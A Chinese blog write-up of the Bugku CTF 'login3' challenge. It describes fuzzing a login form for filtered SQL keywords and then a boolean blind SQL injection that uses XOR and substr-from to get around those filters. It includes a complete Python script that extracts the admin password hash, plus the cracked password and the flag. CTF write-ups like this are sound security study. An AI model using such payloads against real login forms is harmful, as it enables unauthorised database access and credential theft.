bugku- web -login3

最新推荐文章于 2023-04-14 20:23:13 发布
最新推荐文章于 2023-04-14 20:23:13 发布
阅读量303 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/vhkjhwbs/article/details/100034687
版权

login3(过滤了 空格、=、union、逗号、and、where等字符的 布尔型盲注)

首先 试一下  admin 和 admin  提示 password error!(这里知道用户名 admin是存在的)

这里知道了用户名 admin,那用万能密码试一下呗

输入密码: admin' or 1 =1  #   提示password error !应该是有 过滤吧

用 自己写的 sql 关键字 字典 在burp-suite 中 跑一下 看看到底有哪些 字符被过滤了:

对username 字段:(返回值为 1016 的 在response 中 提示 非法字符 ,说明 1016 的字符试被过滤的 ,1023的没有过滤)

可以看到   = ,逗号,union ,and 、where 都被过滤了 

对password字段:(username 设置的是 admin  ,注入password,返回值全是 1014,response中全是 passWord error!根本看不出开有哪些字符被过滤了)

咱们的思路肯定不能是 去 一步一步的爆 库 了,太麻烦了

既然知道了用户名  那直接组爆  password 不就行了 

还好没有 过滤  异或 符  ^    那我们就用 异或 注入

当 在 username 中  输入  admin'^' 时   会提示   password error!

                               输入  admin'^1^'时  会提示  username does not exist!

                               输入   admin'^0^'时 会提示  password error!

那我们就可以去 把 admin'^0^'   中  0 位置的 替换成我们的布尔判断语句 

如果 判断语句是正确的即为1  那就会提示 username does not exist!

否则就会提示 : password error ! 

根据这个 去写一个  布尔的盲注脚本:(在用 substr()函数的时候特别注入 逗号 被过滤的  只能 用 from的形式)

import requests

url = "http://123.206.31.85:49167/index.php"
char  = "1234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ {}+-*/="
result = ''
for i in range(1,45):
    stop = 0
    for c in char:#两个payload的表达方式不同 都是可以用的 ,任选其一
        #payload = "admin'^(ascii(mid((select(password)from(admin))from({})))<>{})^0#".format(str(i),ord(c))
        payload = "admin'^(ascii(substr((select(password)from(admin))from({0})))<>{1})^0#".format(str(i),ord(c))
        data = {
            'username': payload,
            'password': '123'
        }
        html = requests.post(url, data=data)
        if 'error' in html.text:
            result +=c
            stop =1
            print(i)
            print("......" + result)
            break #匹配到值后内循环停止
    if stop == 0: #当内循环匹配不到值的时候外循环就停止
            print("\n"+result)
            break

然后就得到 password 的  值 为一个 md5加密过的字符串 :51b7a76d51e70b419f60d3473fb6f900

解密后得到:skctf123456

输入admin  和 skctf123456 后得到flag:


 

SKCTF{b1iNd_SQL_iNJEcti0n!}

Captain Hammer
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
BugKuCTF中套路满满的题-------login3(SKCTF)
qq_42133828的博客
02-09 3036
根据题目给的提示,无疑是基于bool的盲注,而关于盲注的一般都与脚本有关,毕竟很少人会去一个一个猜 然而,再用脚本解决这个问题时,也需要找到准确的注入语句,否则,白费。。。 首先进入页面一试用户名为admin,发现密码报错(说明此用户存在,那么关键的问题就是密码了。。): 再构造语句,进行几次的基于bool盲注的注入,查看一下有没有绕过一些特殊的语句 username='^(1)^1...
CTF Web题 部分WP
热门推荐
wywwzjj
11-26 12万+
1.web2 听说聪明的人都能找到答案 http://123.206.87.240:8002/web2/ CTRL + u 查看源代码 2.计算器 http://123.206.87.240:8002/yanzhengma/ 改一下字符输入长度的限制 3.web基础$_GET http://123.206.87.240:8002/get/ ?var=val 4.web基础$_P...
BugkuWeb题目解析
北观止的博客
07-31 7901
BugkuWeb 1.web2 解析: 源码中有注释 答案: KEY{Web-2-bugKssNNikls9100} 2、计算器 题目出现了一个很简单的验证码,只要输入正确就可以获得flag,但是尝试后发现题目的输入框只能输入一个数字, 果断审查元素,发现了输入框的最大长度被设置成了1,于是修改输入框的maxlength属性为5 输入结果就可以了 来自 https://www.cnblogs.com/kele1997/p/7595839.html flag{CTF-bugku-0032} 3.Web基础$
Bugku-CTF之login3(SKCTF)(基于布尔的SQL盲注)
weixin_30593443的博客
07-12 436
Day41 login3(SKCTF) http://123.206.31.85:49167/ flag格式:SKCTF{xxxxxxxxxxxxx} hint:基于布尔的SQL盲注 本题要点:异或运算、布尔盲注、过滤 打开是一个登录窗口 用bp抓一下包 发送至repeater 没什么新发现........ 随便试试其他用户名,...
项目1实现login登录功能方案设计第三版
dengjiayue的博客
04-14 812
服务端使用用户的提交验证码时的Email去VerificationCode(验证码储存库)获取最后一条匹配的数据(最新生成的验证码数据)的过期时间,和验证码值,如果现在的时间大于过期时间,返回验证码过期,如果小于过期时间,对比传入的数据与数据库中验证码的值Verification(验证码值)是否相同,.9. 重新提交:如果验证码生成后,该用户未进行任何验证(time=0),则生成相同的验证码,并告知用户,如果之前有验证失败(time>0),就生成不同的验证码.避免某些用户在5分钟内没法收到验证码的情况.
login3
qq_44598397的博客
09-27 368
Bugku login3 解释: 题目给出了提示:基于布尔的SQL盲注 打开网页,是登录框,那我们很大可能就是在username或password上进行注入,可能性大一点的是username了吧。 首先输进行一些尝试,找出正确的注入地方以及是否进行了过滤。 反馈是password error! 输入用户名admin1,得到username does not exist!,所以这里应该是先对u...
disconf-web简化可部署版
06-20
3. **压缩包文件解析**: - **newconfig_file.html, modifyFile.html**:这些文件用于处理配置文件的新增和修改操作,提供了用户交互界面。 - **main.html, newconfig_item.html, modifyItem.html**:主要用于配置...
sns-login sns-login
05-11
7. **适应性**:sns-login需要适配不同平台和设备,包括Web、iOS、Android等,确保跨平台的兼容性和一致性。 8. **错误处理与异常流程**:当用户授权失败或取消授权时,应用需要有合适的错误处理机制,引导用户进行...
hht-cweb-login
03-31
Vue网络一个Vue.js项目构建设置# install dependenciesnpm install# serve with hot reload at localhost:8080npm run dev# build for production with minificationnpm run build# build for production and view ...
Full-instagram-login-web
03-21
标题“Full-instagram-login-web”指的是一个项目,该项目专注于模拟Instagram的完整Web登录过程,包括了两步验证。这个项目可能是为了教学目的或者测试安全性而创建的。描述中提到,“ SRC到完整的instagram登录名...
dash-flask-login:在Dash之上实现Flask-login
02-05
该示例通过sqlite3数据库进行用户身份验证,但是您可以通过在config.txt文件中使用数据库URI更改con参数来使用自己的数据库。 这个例子配备了一个标准的用户名test和密码test1 ,但你可以添加使用的用户越多add_...
BugKu--login3(SKCTF)
超人学飞的日子
06-12 7472
Bugku的一道题目,用到了布尔盲注,还过滤了and关键字,这里用到了^(按位异或运算),正好记录下过程和方法。总体写的有点啰嗦,但是我不想让跟我一样入门的小白看教程看到一脸懵逼。题目地址:http://118.89.219.210:49167/index.php随便输入了几个用户名,返回用户名不存在,并没有对密码进行检验。那我们可以猜测是先查找用户名,如果存在,再验证密码。那下一步呢,我试了试a...
http://123.206.31.85/ 上的几道Web题 23-26
WhiteLamp的博客
01-26 965
23、是一个SQL注入,尝试许久未果,我再学学SQL去。。。 24、抓包看了下 会在本地cookie保存一个id,并返回一串flag,base64解码后发现是: 但是这个并不是flag呀 重复后发现,这个flag每次都不一样,再结合速度要快? 难道又像老司机车速那个。 请出脚本(CTF学python系列): import requests,base64 import re
python中报错requests.exceptions.InvalidHeader: Invalid return character or leading space in header: Acc
qq_42133828的博客
02-09 1万+
这是因为你在写头部的时候加入了空格,例: headers={ 'Host' : ' 123.206.31.85:49167', 'User-Agent' : ' Mozilla/5.0 (Windows NT 10.0; WOW64; rv:65.0) Gecko/20100101 Firefox/65.0', 'Accept' : ' text/html,applic...
git报错------用户名或者密码错误
XXXGDZM的博客
01-22 1538
最近学习gitee上传文件,第一次用Git克隆的时候输入自己的地址,会出现一个用户名和密码的输入。 这个就是gitee上的用户名&密码 一旦输入错误,git的命令就没法向下执行,会提示你username or password error. 这个时候没法在命令行更改,需要我们手动更改。 面向 Windows10系统进行操作 1.标题打开控制面板——找到 “凭据管理器” 2.标题选择 windows 凭据 3.标题找到gitee-编辑 即可 原文链接 https://blog.csdn.net
Bugku_web_login3(关于有过滤的sql盲注)
silence1_的博客
09-01 614
Bugku_web_login3(SKCTF) 题目 题目链接:http://123.206.31.85:49167/ hint:基于布尔的SQL盲注 打开题目是一个登录框,先试试admin,admin,回显password error! 再试试admin’,admin,回显username does not exist 可见username是admin,再试试admin’# ,又回显pass...
bugku-Web-login3(SKCTF)(登录用户名+异或方式的bool盲注)
Sea_Sand息禅
04-05 1051
题目给出了提示:基于布尔的SQL盲注 打开网页,是登录框,那我们很大可能就是在username或password上进行注入,可能性大一点的是username了吧。 首先输进行一些尝试,找出正确的注入地方以及是否进行了过滤。 反馈是password error! 输入用户名admin1,得到username does not exist!,所以这里应该是先对username进行查询,这...
开题报告达达宠物认领信息网站的设计与实现 已通过开题答辩的.docx
最新发布
07-25
宠物认领信息网站的主要目的是为寻找宠物的失主和寻找新家的宠物提供一个在线的信息交流平台。通过这个平台,失主可以发布失宠信息,寻找走失或遗弃的宠物;而救助人或组织则可以发布待领养的宠物信息,为那些无家可归的宠物寻找一个永久的归宿。 这样的网站通常会提供一个详细的宠物数据库,包括照片、品种、年龄、健康状况等信息,以便让失主能够方便地找到自己的宠物。同时,网站还会提供一些相关的服务,如失主与救助人之间的在线交流、宠物匹配推荐、领养手续办理等,以帮助双方顺利完成宠物的认领和领养过程。 宠物认领信息网站的目的在于提高失宠找到宠物的几率,减少流浪宠物的数量,并为那些无家可归的宠物提供一个温馨的新家。同时,网站还能促进社会对流浪宠物的关注和保护,提高人们的动物保护意识。
开题报告创权法律服务系统 已通过开题答辩的.doc
07-25
进入20世纪80年代,我国加快了改革开放的步伐,市场经济体制已逐步形成,我国的经济发展受世人所瞩目,但法律法规的置后,使经济发展不规范问题暴露的相当严重,特别是社会整体信用的缺失,使消费环境不断恶化。而如今随着城镇化的高速推进,精神追求远不及物质发展迅速,维权问题也越来越成为人们十分关注的社会话题。 维权是指维护个人或群体的合法权益,范围包括人身损害、土地纠纷、 医疗事故、婚姻、家庭、继承等民事纠纷所进行的行政及司法诉讼。维护消费者合法权益关系着全社会每个人的利益,群众利益无小事。维护消费者合法权益正体现着“权为民所用,利为民所谋”。而现如今由于法律规则的不完善加上自身对法律知识的不了解,导致很多公民的权益问题在复杂的社会情况下无法得到妥善的解决,使得公民的财产和心理受到难以弥补的损失,严重威胁到社会的安全与稳定,公民之间的诚信与统一。因此更便捷、迅速地维护公民的合法权益,已经成为了一个刻不容缓去解决的社会问题。
linux --no-login
05-10
`--no-login`是一个选项,用于在不执行登录 shell 的情况下启动 shell。它通常用于执行特定任务的脚本或命令,而不需要用户交互式地登录到系统中。例如,您可以使用以下命令执行脚本而无需登录: ``` $ /bin/bash -...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值